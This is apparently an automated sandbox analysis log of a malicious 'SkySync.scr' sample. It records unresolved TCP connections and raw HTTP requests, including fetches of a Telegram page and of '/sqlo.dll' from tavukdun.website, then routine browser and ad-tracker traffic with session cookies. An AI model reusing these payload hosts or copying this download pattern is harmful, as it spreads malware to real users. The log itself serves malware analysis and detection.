Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.1

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00B029BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_00B029BA

Source: global traffic	HTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGKnjlLkGIjA4JKXQrmZ41WigJLz9SdzUwH9z-Soh3S6otxgqs3sYzUOFvKSGNY7x3vw11prSaikyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGKnjlLkGIjDB6F_TrQLAFE94iLL1B0qdDbD51oL79FFvSN9QFQfLnCWSC8OP7uiCV5bxKOdNrPsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e534de69cad646680d_15746174916847639097
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGMPllLkGIjDv19O-TQaehGs4CSEAsU7rd1JcKOqllDHwYGF3Bb1cH04t-5z9nPXgYmFTY64XsCcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGMPllLkGIjAtGIvKzVg3AE6PiBpPfQx-2WM8-SG7P8hm8stV6RvffIWfQqKgkHW0kGgB2NlRAVsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /b?rn=1730491096841&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1537FB4C2D6A69131BC6EE662C9A68C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /b2?rn=1730491096841&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1537FB4C2D6A69131BC6EE662C9A68C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1F7d9f5bb2849a5509409d51730491097
Source: global traffic	HTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uidmappixel?ext_uid=1537FB4C2D6A69131BC6EE662C9A68C5&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /m?cdsp=516415&c=1537FB4C2D6A69131BC6EE662C9A68C5&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mapuid?suid=1537FB4C2D6A69131BC6EE662C9A68C5&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=1537FB4C2D6A69131BC6EE662C9A68C5&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mapuid?member=280&user=172DCF8F4EDA69E736C3DAA54F2A68BD;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cs/msn?id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cs/msn?id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D172DCF8F4EDA69E736C3DAA54F2A68BD%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D172DCF8F4EDA69E736C3DAA54F2A68BD%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?ssp=msn&id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
